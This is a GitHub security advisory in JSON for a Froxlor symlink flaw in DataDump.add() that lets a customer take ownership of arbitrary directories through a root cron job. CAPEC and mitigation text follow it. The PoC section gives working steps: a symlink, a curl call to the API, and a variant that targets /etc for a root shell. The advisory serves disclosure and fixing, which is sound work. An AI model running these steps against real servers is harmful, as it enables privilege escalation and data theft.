  "details": "## Summary\n\n`DataDump.add()` constructs the export destination path from user-supplied input without passing the `$fixed_homedir` parameter to `FileDir::makeCorrectDir()`, bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes `chown -R` on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.\n\n## Details\n\nThe vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to `FileDir::makeCorrectDir()` via a `$fixed_homedir` parameter. When provided, it walks each path component checking for symlinks that escape the customer\u0027s home directory (lines 134-157 of `lib/Froxlor/FileDir.php`).\n\nEvery customer-facing API command that builds a path from user input passes this parameter:\n\n```php\n// DirProtections.php:87\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// DirOptions.php:96\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// Ftps.php:178\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// SubDomains.php:585\nreturn FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n```\n\nBut `DataDump.add()` was missed:\n\n```php\n// DataDump.php:88 \u2014 NO $fixed_homedir parameter\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path);\n```\n\nThe path flows unvalidated into a cron task (`lib/Froxlor/Api/Commands/DataDump.php:133`):\n\n```php\nCronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);\n```\n\nWhen `ExportCron::handle()` runs as root, it executes at `lib/Froxlor/Cron/System/ExportCron.php:232`:\n\n```php\nFileDir::safe_exec(\u0027chown -R \u0027 . (int)$data[\u0027uid\u0027] . \u0027:\u0027 . (int)$data[\u0027gid\u0027] . \u0027 \u0027 . escapeshellarg($data[\u0027destdir\u0027]));\n```\n\nThe `chown -R` command follows symlinks in its target argument. If `$data[\u0027destdir\u0027]` resolves through a symlink to an arbitrary directory, the attacker\u0027s UID/GID is applied recursively to that directory and all its contents.\n\nThe `Validate::validate()` call on line 86 uses an empty pattern, which falls back to `/^[^\\r\\n\\t\\f\\0]*$/D` \u2014 this only strips control characters and does not prevent symlink names. `makeSecurePath()` strips shell metacharacters and `..` traversal but does not check for symlinks.\n\n## PoC\n\nPrerequisites:\n- `system.exportenabled` = 1 (admin setting)\n- Customer account with API key and FTP/SSH access\n\n```bash\n# Step 1: Create a symlink inside the customer\u0027s docroot pointing to a victim directory\n# (customer has FTP/SSH access to their own docroot)\nssh customer@server \u0027ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal\u0027\n\n# Step 2: Schedule data export via API with path pointing to the symlink\ncurl -X POST \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"header\":{\"apikey\":\"CUSTOMER_API_KEY\",\"secret\":\"CUSTOMER_API_SECRET\"},\"body\":{\"command\":\"DataDump.add\",\"params\":{\"path\":\"steal\",\"dump_web\":\"1\"}}}\u0027 \\\n  https://panel.example.com/api.php\n\n# Expected response: 200 OK with task_data including destdir\n\n# Step 3: Wait for ExportCron to run (hourly cron as root)\n# The cron executes:\n#   mkdir -p \u0027/var/customers/webs/attacker_customer/steal/\u0027       (follows symlink, dir exists)\n#   tar cfz ... -C /var/customers/webs/attacker_customer/ .       (tars attacker\u0027s web data)\n#   chown -R \u003cattacker_uid\u003e:\u003cattacker_gid\u003e \u0027/var/customers/webs/attacker_customer/steal/.tmp/\u0027\n#   mv export.tar.gz \u0027/var/customers/webs/attacker_customer/steal/\u0027\n#   chown -R \u003cattacker_uid\u003e:\u003cattacker_gid\u003e \u0027/var/customers/webs/attacker_customer/steal/\u0027\n#\n# The final chown resolves the symlink and recursively chowns\n# /var/customers/webs/victim_customer/ to the attacker\u0027s UID/GID.\n\n# Step 4: Attacker now owns all of victim\u0027s web files\nssh customer@server \u0027ls -la /var/customers/webs/victim_customer/\u0027\n# All files now owned by attacker_customer UID\n\n# For system-level escalation, the symlink can target /etc:\n# ln -s /etc /var/customers/webs/attacker_customer/steal\n# After cron: attacker owns /etc/passwd, /etc/shadow \u2192 root shell\n```\n\n## Impact\n\n- **Horizontal privilege escalation:** A customer can take ownership of any other customer\u0027s web files, databases exports, and email data on the same server.\n- **Vertical privilege escalation:** By targeting system directories (e.g., `/etc`), the customer can gain read/write access to `/etc/passwd` and `/etc/shadow`, enabling creation of a root account or password modification.\n- **Data breach:** Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.\n- **Service disruption:** Changing ownership of system directories can break system services.\n\nThe attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.\n\n## Recommended Fix\n\nPass `$customer[\u0027documentroot\u0027]` as the `$fixed_homedir` parameter in `DataDump.add()`, consistent with every other API command:\n\n```php\n// lib/Froxlor/Api/Commands/DataDump.php, line 88\n// Before (vulnerable):\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path);\n\n// After (fixed):\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n```\n\nAdditionally, the `ExportCron` should use `chown -h` (no-dereference) or validate the destination path is not a symlink before executing `chown -R`:\n\n```php\n// lib/Froxlor/Cron/System/ExportCron.php, line 232\n// Add symlink check before chown\nif (is_link(rtrim($data[\u0027destdir\u0027], \u0027/\u0027))) {\n    $cronlog-\u003elogAction(FroxlorLogger::CRON_ACTION, LOG_ERR, \u0027Export destination is a symlink, skipping chown for security: \u0027 . $data[\u0027destdir\u0027]);\n} else {\n    FileDir::safe_exec(\u0027chown -R \u0027 . (int)$data[\u0027uid\u0027] . \u0027:\u0027 . (int)$data[\u0027gid\u0027] . \u0027 \u0027 . escapeshellarg($data[\u0027destdir\u0027]));\n}\n```",
  "id": "GHSA-75h4-c557-j89r",
  "modified": "2026-04-24T20:54:08Z",
  "published": "2026-04-16T00:47:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-75h4-c557-j89r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41231"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/commit/2987b0e8806ef12b532410050ad76d13d673a87d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor has Incomplete Symlink Validation in DataDump.add() Allows Arbitrary Directory Ownership Takeover via Cron"
}

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.